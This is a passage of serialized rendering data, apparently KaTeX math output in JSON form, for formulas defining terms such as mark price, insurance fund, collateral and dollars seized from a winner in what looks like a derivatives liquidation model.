"className":2622},[304],[2624,2644],{"type":25,"tag":216,"props":2625,"children":2627},{"className":2626,"style":2270},[309],[2628],{"type":25,"tag":216,"props":2629,"children":2630},{"style":2274},[2631,2635],{"type":25,"tag":216,"props":2632,"children":2634},{"className":2633,"style":2181},[319],[],{"type":25,"tag":216,"props":2636,"children":2638},{"className":2637},[2186,2187,2188,2189],[2639],{"type":25,"tag":216,"props":2640,"children":2642},{"className":2641},[246,2151,2189],[2643],{"type":31,"value":2289},{"type":25,"tag":216,"props":2645,"children":2647},{"className":2646},[408],[2648],{"type":31,"value":411},{"type":25,"tag":216,"props":2650,"children":2652},{"className":2651},[304],[2653],{"type":25,"tag":216,"props":2654,"children":2656},{"className":2655,"style":2209},[309],[2657],{"type":25,"tag":216,"props":2658,"children":2659},{},[],{"type":25,"tag":216,"props":2661,"children":2663},{"style":2662},"top:-0.3652em;",[2664,2668],{"type":25,"tag":216,"props":2665,"children":2667},{"className":2666,"style":2138},[319],[],{"type":25,"tag":216,"props":2669,"children":2671},{"className":2670},[246],[2672],{"type":25,"tag":216,"props":2673,"children":2675},{"className":2674},[246],[2676,2683],{"type":25,"tag":216,"props":2677,"children":2680},{"className":2678,"style":2679},[246,2151],"margin-right:0.08125em;",[2681],{"type":31,"value":2682},"H",{"type":25,"tag":216,"props":2684,"children":2686},{"className":2685},[2159],[2687],{"type":25,"tag":216,"props":2688,"children":2690},{"className":2689},[298,299],[2691,2722],{"type":25,"tag":216,"props":2692,"children":2694},{"className":2693},[304],[2695,2717],{"type":25,"tag":216,"props":2696,"children":2699},{"className":2697,"style":2698},[309],"height:0.3283em;",[2700],{"type":25,"tag":216,"props":2701,"children":2703},{"style":2702},"top:-2.55em;margin-left:-0.0813em;margin-right:0.05em;",[2704,2708],{"type":25,"tag":216,"props":2705,"children":2707},{"className":2706,"style":2181},[319],[],{"type":25,"tag":216,"props":2709,"children":2711},{"className":2710},[2186,2187,2188,2189],[2712],{"type":25,"tag":216,"props":2713,"children":2715},{"className":2714,"style":2152},[246,2151,2189],[2716],{"type":31,"value":177},{"type":25,"tag":216,"props":2718,"children":2720},{"className":2719},[408],[2721],{"type":31,"value":411},{"type":25,"tag":216,"props":2723,"children":2725},{"className":2724},[304],[2726],{"type":25,"tag":216,"props":2727,"children":2729},{"className":2728,"style":2209},[309],[2730],{"type":25,"tag":216,"props":2731,"children":2732},{},[],{"type":25,"tag":216,"props":2734,"children":2736},{"style":2735},"top:2.2624em;",[2737,2741],{"type":25,"tag":216,"props":2738,"children":2740},{"className":2739,"style":2138},[319],[],{"type":25,"tag":216,"props":2742,"children":2744},{"className":2743},[246],[2745],{"type":25,"tag":216,"props":2746,"children":2748},{"className":2747},[246],[2749,2756],{"type":25,"tag":216,"props":2750,"children":2753},{"className":2751,"style":2752},[246,2151],"margin-right:0.02778em;",[2754],{"type":31,"value":2755},"D",{"type":25,"tag":216,"props":2757,"children":2759},{"className":2758},[2159],[2760],{"type":25,"tag":216,"props":2761,"children":2763},{"className":2762},[298,299],[2764,2794],{"type":25,"tag":216,"props":2765,"children":2767},{"className":2766},[304],[2768,2789],{"type":25,"tag":216,"props":2769,"children":2771},{"className":2770,"style":2698},[309],[2772],{"type":25,"tag":216,"props":2773,"children":2775},{"style":2774},"top:-2.55em;margin-left:-0.0278em;margin-right:0.05em;",[2776,2780],{"type":25,"tag":216,"props":2777,"children":2779},{"className":2778,"style":2181},[319],[],{"type":25,"tag":216,"props":2781,"children":2783},{"className":2782},[2186,2187,2188,2189],[2784],{"type":25,"tag":216,"props":2785,"children":2787},{"className":2786,"style":2152},[246,2151,2189],[2788],{"type":31,"value":177},{"type":25,"tag":216,"props":2790,"children":2792},{"className":2791},[408],[2793],{"type":31,"value":411},{"type":25,"tag":216,"props":2795,"children":2797},{"className":2796},[304],[2798],{"type":25,"tag":216,"props":2799,"children":2801},{"className":2800,"style":2209},[309],[2802],{"type":25,"tag":216,"props":2803,"children":2804},{},[],{"type":25,"tag":216,"props":2806,"children":2808},{"style":2807},"top:4.8901em;",[2809,2813],{"type":25,"tag":216,"props":2810,"children":2812},{"className":2811,"style":2138},[319],[],{"type":25,"tag":216,"props":2814,"children":2816},{"className":2815},[246],[2817],{"type":25,"tag":216,"props":2818,"children":2820},{"className":2819},[246],[2821,2828],{"type":25,"tag":216,"props":2822,"children":2825},{"className":2823,"style":2824},[246,2151],"margin-right:0.10903em;",[2826],{"type":31,"value":2827},"U",{"type":25,"tag":216,"props":2829,"children":2831},{"className":2830},[2159],[2832],{"type":25,"tag":216,"props":2833,"children":2835},{"className":2834},[298,299],[2836,2866],{"type":25,"tag":216,"props":2837,"children":2839},{"className":2838},[304],[2840,2861],{"type":25,"tag":216,"props":2841,"children":2843},{"className":2842,"style":2698},[309],[2844],{"type":25,"tag":216,"props":2845,"children":2847},{"style":2846},"top:-2.55em;margin-left:-0.109em;margin-right:0.05em;",[2848,2852],{"type":25,"tag":216,"props":2849,"children":2851},{"className":2850,"style":2181},[319],[],{"type":25,"tag":216,"props":2853,"children":2855},{"className":2854},[2186,2187,2188,2189],[2856],{"type":25,"tag":216,"props":2857,"children":2859},{"className":2858,"style":2152},[246,2151,2189],[2860],{"type":31,"value":177},{"type":25,"tag":216,"props":2862,"children":2864},{"className":2863},[408],[2865],{"type":31,"value":411},{"type":25,"tag":216,"props":2867,"children":2869},{"className":2868},[304],[2870],{"type":25,"tag":216,"props":2871,"children":2873},{"className":2872,"style":2209},[309],[2874],{"type":25,"tag":216,"props":2875,"children":2876},{},[],{"type":25,"tag":216,"props":2878,"children":2880},{"style":2879},"top:7.3078em;",[2881,2885],{"type":25,"tag":216,"props":2882,"children":2884},{"className":2883,"style":2138},[319],[],{"type":25,"tag":216,"props":2886,"children":2888},{"className":2887},[246],[2889],{"type":25,"tag":216,"props":2890,"children":2892},{"className":2891},[246],[2893,2900],{"type":25,"tag":216,"props":2894,"children":2897},{"className":2895,"style":2896},[246,2151],"margin-right:0.00773em;",[2898],{"type":31,"value":2899},"R",{"type":25,"tag":216,"props":2901,"children":2903},{"className":2902},[2159],[2904],{"type":25,"tag":216,"props":2905,"children":2907},{"className":2906},[298,299],[2908,2940],{"type":25,"tag":216,"props":2909,"children":2911},{"className":2910},[304],[2912,2935],{"type":25,"tag":216,"props":2913,"children":2916},{"className":2914,"style":2915},[309],"height:0.2806em;",[2917],{"type":25,"tag":216,"props":2918,"children":2920},{"style":2919},"top:-2.55em;margin-left:-0.0077em;margin-right:0.05em;",[2921,2925],{"type":25,"tag":216,"props":2922,"children":2924},{"className":2923,"style":2181},[319],[],{"type":25,"tag":216,"props":2926,"children":2928},{"className":2927},[2186,2187,2188,2189],[2929],{"type":25,"tag":216,"props":2930,"children":2932},{"className":2931},[246,2151,2189],[2933],{"type":31,"value":2934},"t",{"type":25,"tag":216,"props":2936,"children":2938},{"className":2937},[408],[2939],{"type":31,"value":411},{"type":25,"tag":216,"props":2941,"children":2943},{"className":2942},[304],[2944],{"type":25,"tag":216,"props":2945,"children":2947},{"className":2946,"style":2209},[309],[2948],{"type":25,"tag":216,"props":2949,"children":2950},{},[],{"type":25,"tag":216,"props":2952,"children":2954},{"className":2953},[408],[2955],{"type":31,"value":411},{"type":25,"tag":216,"props":2957,"children":2959},{"className":2958},[304],[2960],{"type":25,"tag":216,"props":2961,"children":2964},{"className":2962,"style":2963},[309],"height:11.3392em;",[2965],{"type":25,"tag":216,"props":2966,"children":2967},{},[],{"type":25,"tag":216,"props":2969,"children":2971},{"className":2970},[1039],[2972],{"type":25,"tag":216,"props":2973,"children":2975},{"className":2974},[298,299],[2976,4684],{"type":25,"tag":216,"props":2977,"children":2979},{"className":2978},[304],[2980,4679],{"type":25,"tag":216,"props":2981,"children":2983},{"className":2982,"style":2129},[309],[2984,3023,3061,3208,3445,3601,3706,3749,3970,4131,4321,4473],{"type":25,"tag":216,"props":2985,"children":2986},{"style":2133},[2987,2991],{"type":25,"tag":216,"props":2988,"children":2990},{"className":2989,"style":2138},[319],[],{"type":25,"tag":216,"props":2992,"children":2994},{"className":2993},[246],[2995,2999,3003,3009,3013],{"type":25,"tag":216,"props":2996,"children":2998},{"className":2997},[246],[],{"type":25,"tag":216,"props":3000,"children":3002},{"className":3001,"style":258},[257],[],{"type":25,"tag":216,"props":3004,"children":3006},{"className":3005},[263],[3007],{"type":31,"value":3008},":=",{"type":25,"tag":216,"props":3010,"children":3012},{"className":3011,"style":258},[257],[],{"type":25,"tag":216,"props":3014,"children":3016},{"className":3015},[246,31],[3017],{"type":25,"tag":216,"props":3018,"children":3020},{"className":3019},[246],[3021],{"type":31,"value":3022},"mark price",{"type":25,"tag":216,"props":3024,"children":3025},{"style":2216},[3026,3030],{"type":25,"tag":216,"props":3027,"children":3029},{"className":3028,"style":2138},[319],[],{"type":25,"tag":216,"props":3031,"children":3033},{"className":3032},[246],[3034,3038,3042,3047,3051],{"type":25,"tag":216,"props":3035,"children":3037},{"className":3036},[246],[],{"type":25,"tag":216,"props":3039,"children":3041},{"className":3040,"style":258},[257],[],{"type":25,"tag":216,"props":3043,"children":3045},{"className":3044},[263],[3046],{"type":31,"value":3008},{"type":25,"tag":216,"props":3048,"children":3050},{"className":3049,"style":258},[257],[],{"type":25,"tag":216,"props":3052,"children":3054},{"className":3053},[246,31],[3055],{"type":25,"tag":216,"props":3056,"children":3058},{"className":3057},[246],[3059],{"type":31,"value":3060},"insurance fund",{"type":25,"tag":216,"props":3062,"children":3063},{"style":2235},[3064,3068],{"type":25,"tag":216,"props":3065,"children":3067},{"className":3066,"style":2138},[319],[],{"type":25,"tag":216,"props":3069,"children":3071},{"className":3070},[246],[3072,3076,3080,3085,3089,3099,3103,3108,3112],{"type":25,"tag":216,"props":3073,"children":3075},{"className":3074},[246],[],{"type":25,"tag":216,"props":3077,"children":3079},{"className":3078,"style":258},[257],[],{"type":25,"tag":216,"props":3081,"children":3083},{"className":3082},[263],[3084],{"type":31,"value":3008},{"type":25,"tag":216,"props":3086,"children":3088},{"className":3087,"style":258},[257],[],{"type":25,"tag":216,"props":3090,"children":3092},{"className":3091},[246,31],[3093],{"type":25,"tag":216,"props":3094,"children":3096},{"className":3095},[246],[3097],{"type":31,"value":3098},"collateral",{"type":25,"tag":216,"props":3100,"children":3102},{"className":3101,"style":258},[257],[],{"type":25,"tag":216,"props":3104,"children":3106},{"className":3105},[263],[3107],{"type":31,"value":266},{"type":25,"tag":216,"props":3109,"children":3111},{"className":3110,"style":258},[257],[],{"type":25,"tag":216,"props":3113,"children":3115},{"className":3114},[246],[3116,3120,3204],{"type":25,"tag":216,"props":3117,"children":3119},{"className":3118},[287,288],[],{"type":25,"tag":216,"props":3121,"children":3123},{"className":3122},[293],[3124],{"type":25,"tag":216,"props":3125,"children":3127},{"className":3126},[298,299],[3128,3193],{"type":25,"tag":216,"props":3129,"children":3131},{"className":3130},[304],[3132,3188],{"type":25,"tag":216,"props":3133,"children":3136},{"className":3134,"style":3135},[309],"height:1.3714em;",[3137,3157,3168],{"type":25,"tag":216,"props":3138,"children":3139},{"style":314},[3140,3144],{"type":25,"tag":216,"props":3141,"children":3143},{"className":3142,"style":320},[319],[],{"type":25,"tag":216,"props":3145,"children":3147},{"className":3146},[246],[3148],{"type":25,"tag":216,"props":3149,"children":3151},{"className":3150},[246,31],[3152],{"type":25,"tag":216,"props":3153,"children":3155},{"className":3154},[246],[3156],{"type":31,"value":357},{"type":25,"tag":216,"props":3158,"children":3159},{"style":360},[3160,3164],{"type":25,"tag":216,"props":3161,"children":3163},{"className":3162,"style":320},[319],[],{"type":25,"tag":216,"props":3165,"children":3167},{"className":3166,"style":370},[369],[],{"type":25,"tag":216,"props":3169,"children":3170},{"style":374},[3171,3175],{"type":25,"tag":216,"props":3172,"children":3174},{"className":3173,"style":320},[319],[],{"type":25,"tag":216,"props":3176,"children":3178},{"className":3177},[246],[3179],{"type":25,"tag":216,"props":3180,"children":3182},{"className":3181},[246,31],[3183],{"type":25,"tag":216,"props":3184,"children":3186},{"className":3185},[246],[3187],{"type":31,"value":399},{"type":25,"tag":216,"props":3189,"children":3191},{"className":3190},[408],[3192],{"type":31,"value":411},{"type":25,"tag":216,"props":3194,"children":3196},{"className":3195},[304],[3197],{"type":25,"tag":216,"props":3198,"children":3200},{"className":3199,"style":419},[309],[3201],{"type":25,"tag":216,"props":3202,"children":3203},{},[],{"type":25,"tag":216,"props":3205,"children":3207},{"className":3206},[427,288],[],{"type":25,"tag":216,"props":3209,"children":3210},{"style":2308},[3211,3215],{"type":25,"tag":216,"props":3212,"children":3214},{"className":3213,"style":2138},[319],[],{"type":25,"tag":216,"props":3216,"children":3218},{"className":3217},[246],[3219,3223,3227,3232,3236,3294,3298,3303,3307,3312,3369,3373,3379,3383,3440],{"type":25,"tag":216,"props":3220,"children":3222},{"className":3221},[246],[],{"type":25,"tag":216,"props":3224,"children":3226},{"className":3225,"style":258},[257],[],{"type":25,"tag":216,"props":3228,"children":3230},{"className":3229},[263],[3231],{"type":31,"value":266},{"type":25,"tag":216,"props":3233,"children":3235},{"className":3234,"style":258},[257],[],{"type":25,"tag":216,"props":3237,"children":3239},{"className":3238},[246],[3240,3246],{"type":25,"tag":216,"props":3241,"children":3243},{"className":3242},[246,2151],[3244],{"type":31,"value":3245},"s",{"type":25,"tag":216,"props":3247,"children":3249},{"className":3248},[2159],[3250],{"type":25,"tag":216,"props":3251,"children":3253},{"className":3252},[298,299],[3254,3283],{"type":25,"tag":216,"props":3255,"children":3257},{"className":3256},[304],[3258,3278],{"type":25,"tag":216,"props":3259,"children":3261},{"className":3260,"style":2270},[309],[3262],{"type":25,"tag":216,"props":3263,"children":3264},{"style":2274},[3265,3269],{"type":25,"tag":216,"props":3266,"children":3268},{"className":3267,"style":2181},[319],[],{"type":25,"tag":216,"props":3270,"children":3272},{"className":3271},[2186,2187,2188,2189],[3273],{"type":25,"tag":216,"props":3274,"children":3276},{"className":3275},[246,2151,2189],[3277],{"type":31,"value":2289},{"type":25,"tag":216,"props":3279,"children":3281},{"className":3280},[408],[3282],{"type":31,"value":411},{"type":25,"tag":216,"props":3284,"children":3286},{"className":3285},[304],[3287],{"type":25,"tag":216,"props":3288,"children":3290},{"className":3289,"style":2209},[309],[3291],{"type":25,"tag":216,"props":3292,"children":3293},{},[],{"type":25,"tag":216,"props":3295,"children":3297},{"className":3296,"style":335},[257],[],{"type":25,"tag":216,"props":3299,"children":3301},{"className":3300},[340],[3302],{"type":31,"value":343},{"type":25,"tag":216,"props":3304,"children":3306},{"className":3305,"style":335},[257],[],{"type":25,"tag":216,"props":3308,"children":3310},{"className":3309},[287],[3311],{"type":31,"value":1850},{"type":25,"tag":216,"props":3313,"children":3315},{"className":3314},[246],[3316,3321],{"type":25,"tag":216,"props":3317,"children":3319},{"className":3318,"style":2152},[246,2151],[3320],{"type":31,"value":2155},{"type":25,"tag":216,"props":3322,"children":3324},{"className":3323},[2159],[3325],{"type":25,"tag":216,"props":3326,"children":3328},{"className":3327},[298,299],[3329,3358],{"type":25,"tag":216,"props":3330,"children":3332},{"className":3331},[304],[3333,3353],{"type":25,"tag":216,"props":3334,"children":3336},{"className":3335,"style":2172},[309],[3337],{"type":25,"tag":216,"props":3338,"children":3339},{"style":2176},[3340,3344],{"type":25,"tag":216,"props":3341,"children":3343},{"className":3342,"style":2181},[319],[],{"type":25,"tag":216,"props":3345,"children":3347},{"className":3346},[2186,2187,2188,2189],[3348],{"type":25,"tag":216,"props":3349,"children":3351},{"className":3350},[246,2151,2189],[3352],{"type":31,"value":2196},{"type":25,"tag":216,"props":3354,"children":3356},{"className":3355},[408],[3357],{"type":31,"value":411},{"type":25,"tag":216,"props":3359,"children":3361},{"className":3360},[304],[3362],{"type":25,"tag":216,"props":3363,"children":3365},{"className":3364,"style":2209},[309],[3366],{"type":25,"tag":216,"props":3367,"children":3368},{},[],{"type":25,"tag":216,"props":3370,"children":3372},{"className":3371,"style":335},[257],[],{"type":25,"tag":216,"props":3374,"children":3376},{"className":3375},[340],[3377],{"type":31,"value":3378},"−",{"type":25,"tag":216,"props":3380,"children":3382},{"className":3381,"style":335},[257],[],{"type":25,"tag":216,"props":3384,"children":3386},{"className":3385},[246],[3387,3392],{"type":25,"tag":216,"props":3388,"children":3390},{"className":3389},[246,2151],[3391],{"type":31,"value":38},{"type":25,"tag":216,"props":3393,"children":3395},{"className":3394},[2159],[3396],{"type":25,"tag":216,"props":3397,"children":3399},{"className":3398},[298,299],[3400,3429],{"type":25,"tag":216,"props":3401,"children":3403},{"className":3402},[304],[3404,3424],{"type":25,"tag":216,"props":3405,"children":3407},{"className":3406,"style":2270},[309],[3408],{"type":25,"tag":216,"props":3409,"children":3410},{"style":2274},[3411,3415],{"type":25,"tag":216,"props":3412,"children":3414},{"className":3413,"style":2181},[319],[],{"type":25,"tag":216,"props":3416,"children":3418},{"className":3417},[2186,2187,2188,2189],[3419],{"type":25,"tag":216,"props":3420,"children":3422},{"className":3421},[246,2151,2189],[3423],{"type":31,"value":2289},{"type":25,"tag":216,"props":3425,"children":3427},{"className":3426},[408],[3428],{"type":31,"value":411},{"type":25,"tag":216,"props":3430,"children":3432},{"className":3431},[304],[3433],{"type":25,"tag":216,"props":3434,"children":3436},{"className":3435,"style":2209},[309],[3437],{"type":25,"tag":216,"props":3438,"children":3439},{},[],{"type":25,"tag":216,"props":3441,"children":3443},{"className":3442},[427],[3444],{"type":31,"value":1888},{"type":25,"tag":216,"props":3446,"children":3447},{"style":2380},[3448,3452],{"type":25,"tag":216,"props":3449,"children":3451},{"className":3450,"style":2138},[319],[],{"type":25,"tag":216,"props":3453,"children":3455},{"className":3454},[246],[3456,3460,3464,3469,3473,3530,3534,3540,3544],{"type":25,"tag":216,"props":3457,"children":3459},{"className":3458},[246],[],{"type":25,"tag":216,"props":3461,"children":3463},{"className":3462,"style":258},[257],[],{"type":25,"tag":216,"props":3465,"children":3467},{"className":3466},[263],[3468],{"type":31,"value":266},{"type":25,"tag":216,"props":3470,"children":3472},{"className":3471,"style":258},[257],[],{"type":25,"tag":216,"props":3474,"children":3476},{"className":3475},[246],[3477,3482],{"type":25,"tag":216,"props":3478,"children":3480},{"className":3479},[246,2151],[3481],{"type":31,"value":2254},{"type":25,"tag":216,"props":3483,"children":3485},{"className":3484},[2159],[3486],{"type":25,"tag":216,"props":3487,"children":3489},{"className":3488},[298,299],[3490,3519],{"type":25,"tag":216,"props":3491,"children":3493},{"className":3492},[304],[3494,3514],{"type":25,"tag":216,"props":3495,"children":3497},{"className":3496,"style":2270},[309],[3498],{"type":25,"tag":216,"props":3499,"children":3500},{"style":2274},[3501,3505],{"type":25,"tag":216,"props":3502,"children":3504},{"className":3503,"style":2181},[319],[],{"type":25,"tag":216,"props":3506,"children":3508},{"className":3507},[2186,2187,2188,2189],[3509],{"type":25,"tag":216,"props":3510,"children":3512},{"className":3511},[246,2151,2189],[3513],{"type":31,"value":2289},{"type":25,"tag":216,"props":3515,"children":3517},{"className":3516},[408],[3518],{"type":31,"value":411},{"type":25,"tag":216,"props":3520,"children":3522},{"className":3521},[304],[3523],{"type":25,"tag":216,"props":3524,"children":3526},{"className":3525,"style":2209},[309],[3527],{"type":25,"tag":216,"props":3528,"children":3529},{},[],{"type":25,"tag":216,"props":3531,"children":3533},{"className":3532,"style":335},[257],[],{"type":25,"tag":216,"props":3535,"children":3537},{"className":3536},[340],[3538],{"type":31,"value":3539},"+",{"type":25,"tag":216,"props":3541,"children":3543},{"className":3542,"style":335},[257],[],{"type":25,"tag":216,"props":3545,"children":3547},{"className":3546},[246],[3548,3553],{"type":25,"tag":216,"props":3549,"children":3551},{"className":3550,"style":2325},[246,2151],[3552],{"type":31,"value":2328},{"type":25,"tag":216,"props":3554,"children":3556},{"className":3555},[2159],[3557],{"type":25,"tag":216,"props":3558,"children":3560},{"className":3559},[298,299],[3561,3590],{"type":25,"tag":216,"props":3562,"children":3564},{"className":3563},[304],[3565,3585],{"type":25,"tag":216,"props":3566,"children":3568},{"className":3567,"style":2270},[309],[3569],{"type":25,"tag":216,"props":3570,"children":3571},{"style":2347},[3572,3576],{"type":25,"tag":216,"props":3573,"children":3575},{"className":3574,"style":2181},[319],[],{"type":25,"tag":216,"props":3577,"children":3579},{"className":3578},[2186,2187,2188,2189],[3580],{"type":25,"tag":216,"props":3581,"children":3583},{"className":3582},[246,2151,2189],[3584],{"type":31,"value":2289},{"type":25,"tag":216,"props":3586,"children":3588},{"className":3587},[408],[3589],{"type":31,"value":411},{"type":25,"tag":216,"props":3591,"children":3593},{"className":3592},[304],[3594],{"type":25,"tag":216,"props":3595,"children":3597},{"className":3596,"style":2209},[309],[3598],{"type":25,"tag":216,"props":3599,"children":3600},{},[],{"type":25,"tag":216,"props":3602,"children":3603},{"style":2450},[3604,3608],{"type":25,"tag":216,"props":3605,"children":3607},{"className":3606,"style":2138},[319],[],{"type":25,"tag":216,"props":3609,"children":3611},{"className":3610},[246],[3612,3616,3620,3625,3629],{"type":25,"tag":216,"props":3613,"children":3615},{"className":3614},[246],[],{"type":25,"tag":216,"props":3617,"children":3619},{"className":3618,"style":258},[257],[],{"type":25,"tag":216,"props":3621,"children":3623},{"className":3622},[263],[3624],{"type":31,"value":266},{"type":25,"tag":216,"props":3626,"children":3628},{"className":3627,"style":258},[257],[],{"type":25,"tag":216,"props":3630,"children":3632},{"className":3631},[246],[3633,3638],{"type":25,"tag":216,"props":3634,"children":3636},{"className":3635,"style":2325},[246,2151],[3637],{"type":31,"value":2328},{"type":25,"tag":216,"props":3639,"children":3641},{"className":3640},[2159],[3642],{"type":25,"tag":216,"props":3643,"children":3645},{"className":3644},[298,299],[3646,3694],{"type":25,"tag":216,"props":3647,"children":3649},{"className":3648},[304],[3650,3689],{"type":25,"tag":216,"props":3651,"children":3654},{"className":3652,"style":3653},[309],"height:0.8213em;",[3655,3672],{"type":25,"tag":216,"props":3656,"children":3658},{"style":3657},"top:-2.433em;margin-left:-0.0359em;margin-right:0.05em;",[3659,3663],{"type":25,"tag":216,"props":3660,"children":3662},{"className":3661,"style":2181},[319],[],{"type":25,"tag":216,"props":3664,"children":3666},{"className":3665},[2186,2187,2188,2189],[3667],{"type":25,"tag":216,"props":3668,"children":3670},{"className":3669},[246,2151,2189],[3671],{"type":31,"value":2289},{"type":25,"tag":216,"props":3673,"children":3675},{"style":3674},"top:-3.113em;margin-right:0.05em;",[3676,3680],{"type":25,"tag":216,"props":3677,"children":3679},{"className":3678,"style":2181},[319],[],{"type":25,"tag":216,"props":3681,"children":3683},{"className":3682},[2186,2187,2188,2189],[3684],{"type":25,"tag":216,"props":3685,"children":3687},{"className":3686},[340,2189],[3688],{"type":31,"value":3539},{"type":25,"tag":216,"props":3690,"children":3692},{"className":3691},[408],[3693],{"type":31,"value":411},{"type":25,"tag":216,"props":3695,"children":3697},{"className":3696},[304],[3698],{"type":25,"tag":216,"props":3699,"children":3702},{"className":3700,"style":3701},[309],"height:0.267em;",[3703],{"type":25,"tag":216,"props":3704,"children":3705},{},[],{"type":25,"tag":216,"props":3707,"children":3708},{"style":2522},[3709,3713],{"type":25,"tag":216,"props":3710,"children":3712},{"className":3711,"style":2138},[319],[],{"type":25,"tag":216,"props":3714,"children":3716},{"className":3715},[246],[3717,3721,3725,3730,3734,3744],{"type":25,"tag":216,"props":3718,"children":3720},{"className":3719},[246],[],{"type":25,"tag":216,"props":3722,"children":3724},{"className":3723,"style":258},[257],[],{"type":25,"tag":216,"props":3726,"children":3728},{"className":3727},[263],[3729],{"type":31,"value":3008},{"type":25,"tag":216,"props":3731,"children":3733},{"className":3732,"style":258},[257],[],{"type":25,"tag":216,"props":3735,"children":3737},{"className":3736},[246,31],[3738],{"type":25,"tag":216,"props":3739,"children":3741},{"className":3740},[246],[3742],{"type":31,"value":3743},"dollars seized from winner ",{"type":25,"tag":216,"props":3745,"children":3747},{"className":3746},[246,2151],[3748],{"type":31,"value":2289},{"type":25,"tag":216,"props":3750,"children":3751},{"style":2592},[3752,3756],{"type":25,"tag":216,"props":3753,"children":3755},{"className":3754,"style":2138},[319],[],{"type":25,"tag":216,"props":3757,"children":3759},{"className":3758},[246],[3760,3764,3768,3773,3777],{"type":25,"tag":216,"props":3761,"children":3763},{"className":3762},[246],[],{"type":25,"tag":216,"props":3765,"children":3767},{"className":3766,"style":258},[257],[],{"type":25,"tag":216,"props":3769,"children":3771},{"className":3770},[263],[3772],{"type":31,"value":266},{"type":25,"tag":216,"props":3774,"children":3776},{"className":3775,"style":258},[257],[],{"type":25,"tag":216,"props":3778,"children":3780},{"className":3779},[246],[3781,3785,3966],{"type":25,"tag":216,"props":3782,"children":3784},{"className":3783},[287,288],[],{"type":25,"tag":216,"props":3786,"children":3788},{"className":3787},[293],[3789],{"type":25,"tag":216,"props":3790,"children":3792},{"className":3791},[298,299],[3793,3954],{"type":25,"tag":216,"props":3794,"children":3796},{"className":3795},[304],[3797,3949],{"type":25,"tag":216,"props":3798,"children":3801},{"className":3799,"style":3800},[309],"height:1.1076em;",[3802,3870,3881],{"type":25,"tag":216,"props":3803,"children":3804},{"style":314},[3805,3809],{"type":25,"tag":216,"props":3806,"children":3808},{"className":3807,"style":320},[319],[],{"type":25,"tag":216,"props":3810,"children":3812},{"className":3811},[246],[3813],{"type":25,"tag":216,"props":3814,"children":3816},{"className":3815},[246],[3817,3822],{"type":25,"tag":216,"props":3818,"children":3820},{"className":3819,"style":2467},[246,2151],[3821],{"type":31,"value":2470},{"type":25,"tag":216,"props":3823,"children":3825},{"className":3824},[2159],[3826],{"type":25,"tag":216,"props":3827,"children":3829},{"className":3828},[298,299],[3830,3859],{"type":25,"tag":216,"props":3831,"children":3833},{"className":3832},[304],[3834,3854],{"type":25,"tag":216,"props":3835,"children":3837},{"className":3836,"style":2270},[309],[3838],{"type":25,"tag":216,"props":3839,"children":3840},{"style":2489},[3841,3845],{"type":25,"tag":216,"props":3842,"children":3844},{"className":3843,"style":2181},[319],[],{"type":25,"tag":216,"props":3846,"children":3848},{"className":3847},[2186,2187,2188,2189],[3849],{"type":25,"tag":216,"props":3850,"children":3852},{"className":3851},[246,2151,2189],[3853],{"type":31,"value":2289},{"type":25,"tag":216,"props":3855,"children":3857},{"className":3856},[408],[3858],{"type":31,"value":411},{"type":25,"tag":216,"props":3860,"children":3862},{"className":3861},[304],[3863],{"type":25,"tag":216,"props":3864,"children":3866},{"className":3865,"style":2209},[309],[3867],{"type":25,"tag":216,"props":3868,"children":3869},{},[],{"type":25,"tag":216,"props":3871,"children":3872},{"style":360},[3873,3877],{"type":25,"tag":216,"props":3874,"children":3876},{"className":3875,"style":320},[319],[],{"type":25,"tag":216,"props":3878,"children":3880},{"className":3879,"style":370},[369],[],{"type":25,"tag":216,"props":3882,"children":3883},{"style":374},[3884,3888],{"type":25,"tag":216,"props":3885,"children":3887},{"className":3886,"style":320},[319],[],{"type":25,"tag":216,"props":3889,"children":3891},{"className":3890},[246],[3892],{"type":25,"tag":216,"props":3893,"children":3895},{"className":3894},[246],[3896,3901],{"type":25,"tag":216,"props":3897,"children":3899},{"className":3898},[246,2151],[3900],{"type":31,"value":2541},{"type":25,"tag":216,"props":3902,"children":3904},{"className":3903},[2159],[3905],{"type":25,"tag":216,"props":3906,"children":3908},{"className":3907},[298,299],[3909,3938],{"type":25,"tag":216,"props":3910,"children":3912},{"className":3911},[304],[3913,3933],{"type":25,"tag":216,"props":3914,"children":3916},{"className":3915,"style":2270},[309],[3917],{"type":25,"tag":216,"props":3918,"children":3919},{"style":2274},[3920,3924],{"type":25,"tag":216,"props":3921,"children":3923},{"className":3922,"style":2181},[319],[],{"type":25,"tag":216,"props":3925,"children":3927},{"className":3926},[2186,2187,2188,2189],[3928],{"type":25,"tag":216,"props":3929,"children":3931},{"className":3930},[246,2151,2189],[3932],{"type":31,"value":2289},{"type":25,"tag":216,"props":3934,"children":3936},{"className":3935},[408],[3937],{"type":31,"value":411},{"type":25,"tag":216,"props":3939,"children":3941},{"className":3940},[304],[3942],{"type":25,"tag":216,"props":3943,"children":3945},{"className":3944,"style":2209},[309],[3946],{"type":25,"tag":216,"props":3947,"children":3948},{},[],{"type":25,"tag":216,"props":3950,"children":3952},{"className":3951},[408],[3953],{"type":31,"value":411},{"type":25,"tag":216,"props":3955,"children":3957},{"className":3956},[304],[3958],{"type":25,"tag":216,"props":3959,"children":3962},{"className":3960,"style":3961},[309],"height:0.836em;",[3963],{"type":25,"tag":216,"props":3964,"children":3965},{},[],{"type":25,"tag":216,"props":3967,"children":3969},{"className":3968},[427,288],[],{"type":25,"tag":216,"props":3971,"children":3972},{"style":2662},[3973,3977],{"type":25,"tag":216,"props":3974,"children":3976},{"className":3975,"style":2138},[319],[],{"type":25,"tag":216,"props":3978,"children":3980},{"className":3979},[246],[3981,3985,3989,3994,3998,4070,4074],{"type":25,"tag":216,"props":3982,"children":3984},{"className":3983},[246],[],{"type":25,"tag":216,"props":3986,"children":3988},{"className":3987,"style":258},[257],[],{"type":25,"tag":216,"props":3990,"children":3992},{"className":3991},[263],[3993],{"type":31,"value":266},{"type":25,"tag":216,"props":3995,"children":3997},{"className":3996,"style":258},[257],[],{"type":25,"tag":216,"props":3999,"children":4002},{"className":4000},[1841,4001],"op-limits",[4003],{"type":25,"tag":216,"props":4004,"children":4006},{"className":4005},[298,299],[4007,4058],{"type":25,"tag":216,"props":4008,"children":4010},{"className":4009},[304],[4011,4053],{"type":25,"tag":216,"props":4012,"children":4015},{"className":4013,"style":4014},[309],"height:1.05em;",[4016,4034],{"type":25,"tag":216,"props":4017,"children":4019},{"style":4018},"top:-1.8723em;margin-left:0em;",[4020,4025],{"type":25,"tag":216,"props":4021,"children":4024},{"className":4022,"style":4023},[319],"height:3.05em;",[],{"type":25,"tag":216